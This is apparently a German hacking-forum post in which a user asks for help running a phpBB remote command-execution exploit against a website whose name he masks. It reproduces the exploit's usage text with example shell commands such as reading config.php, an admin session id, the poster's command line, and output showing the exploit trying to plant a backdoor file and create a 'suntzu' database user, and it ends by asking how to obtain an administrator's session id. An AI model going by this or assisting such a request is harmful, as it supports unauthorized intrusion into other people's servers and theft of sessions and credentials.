Zitat Zitat von 666Player555
jaaaa ist ja gut, habs zu schnell angeguckt :evil:

dann halt php, das prinzip bleibt trotzdem gleich.

@floex
warum willst du unbedingt ein video tutorial haben? kannst du etwas nicht lesen?
außerdem hat Suicide in der Exploits sektion ein thread vervasst der als wichtig markiert wurde "Wie führe ich ein PHP-Exploit aus?" dort wird alles schritt für schritt SCHRIFTLICH erklärt
ok
1. ich weiss wie man ein PHP exploit ausführt
2. hab ich nich gefragt wie man ihn ausführt
3. ich habe gefragt "wie ruft man den ein son ein php exploit auf einem Webspace auf?"
4. Ich wollte ein Video haben , weil ich den exploit nicht genau verstehe

Das steht im Exploit wen ich ihn aufrufe:


Code:
-> you need an admin sid, works regardless of magic_quotes_gpc settings
tested and working against a fresh PhpBB installation

Usage: php php20.php host path sid cmd OPTIONS
host:       target server (ip/hostname)
path:       path to PhpBB
sid:        session id
cmd:        a shell command
Options:
   -p[port]:    specify a port other than 80
   -P[ip:port]: specify a proxy
Examples:
php php20.php localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 cat config.php
php php20.php localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 ls -la -p81
php php20.php localhost / 8db5cef976c7e0f51c25c92152b56881 ls -la -P1.1.1.1:80
5. Das ist die sid des admins:

Code:
a5de97d77a4e7ded42c6fe8b40ada6ab
6. wenn ich das "php php20.php www.muesst-ihr-nicht-wissen.de / a5de97d77a4e7ded42c6fe8b40ada6ab -ls -la" jetzt eingebe kommt...

Code:
step 0 -> check if suntzu.php is already installed...
Step 0b -> check if exploit has already succeeded but suntzu.php deleted, try t
 login as suntzu...
step 0c -> query database to create a "suntzu" user with password "suntzu"...
Unable to modify table... maybe wrong admin sid
So jetzt weiss ich nich mehr weiter ich habe nur gefragt wie man diesen Exploit ausführt , weil die rede war das man den erst auf einem php fähigem Webspace uploaden soll und dann ausführen soll.

so ich hoffe das war ausführlich genug um mir eine klare Antwort auf meine Frage "Wie führe ich diesen Epxloit aus mit den richtigen commands ?" ...

mfg floex

EDIT//

ok ich hab grade herausgefunden das das nicht die sid des Admins ist ...

Frage: wie bekomme ich diese sid denn raus? :o